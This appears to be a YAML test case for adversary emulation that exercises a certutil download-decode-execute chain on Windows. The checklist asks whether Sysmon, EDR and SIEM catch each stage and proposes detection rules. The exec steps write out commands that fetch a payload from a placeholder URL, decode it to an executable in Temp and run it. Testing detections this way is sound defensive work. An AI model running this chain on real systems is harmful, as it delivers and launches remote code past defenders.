id: DLEXEC_009_certutil
name: "Download and Execute — Certutil URL Cache Download and Decode"
mitre: "T1105, T1140"
category: download_execute
description: >
  Uses certutil.exe to download a base64-encoded payload from a remote URL, decode
  it to a binary, then execute it. Certutil is a signed Windows binary with a
  -urlcache flag that functions as a downloader. This technique was heavily used
  by APT groups and commodity malware. Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-009] Certutil download via urlcache"

  - type: exec
    binary: cmd.exe
    args: /c certutil -urlcache -split -f PLACEHOLDER_HTTP_URL/payload.b64 C:\Windows\Temp\payload.b64
    timeout_seconds: 30

  - type: sleep
    seconds: 15

  - type: marker
    message: "[DLEXEC-009] Certutil decode b64 to binary"

  - type: exec
    binary: cmd.exe
    args: /c certutil -decode C:\Windows\Temp\payload.b64 C:\Windows\Temp\PLACEHOLDER_FILENAME.exe
    timeout_seconds: 15

  - type: sleep
    seconds: 15

  - type: marker
    message: "[DLEXEC-009] Execute decoded payload"

  - type: exec
    binary: cmd.exe
    args: /c C:\Windows\Temp\PLACEHOLDER_FILENAME.exe
    timeout_seconds: 30

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-009] Cleanup"

  - type: file_delete
    path: "C:\\Windows\\Temp\\payload.b64"

  - type: file_delete
    path: "C:\\Windows\\Temp\\PLACEHOLDER_FILENAME.exe"

analyst_checklist:
  - "Sysmon Event ID 1: certutil.exe with -urlcache and remote URL captured?"
  - "Sysmon Event ID 1: certutil.exe with -decode flag captured separately?"
  - "Sysmon Event ID 3: Network connection from certutil.exe to PLACEHOLDER_HTTP_URL host?"
  - "Sysmon Event ID 11: payload.b64 and decoded .exe file creation in Temp — hashes captured?"
  - "EDR: Alert on certutil.exe -urlcache? High fidelity rule."
  - "EDR: Decoded .exe spawned from cmd.exe — parent chain intact?"
  - "EDR: Hash of decoded binary captured — queryable across fleet?"
  - "SIEM: All 3 stages present (download, decode, execute) and correlatable?"
  - "Rule opportunity (critical): certutil.exe with '-urlcache' in commandline"
  - "Rule opportunity: certutil.exe with '-decode' applied to file in Temp"
  - "Rule opportunity: cmd.exe spawning executable from C:\\Windows\\Temp"
  - "Gap check: certutil -urlcache is a widely known technique — missing it is a major gap."
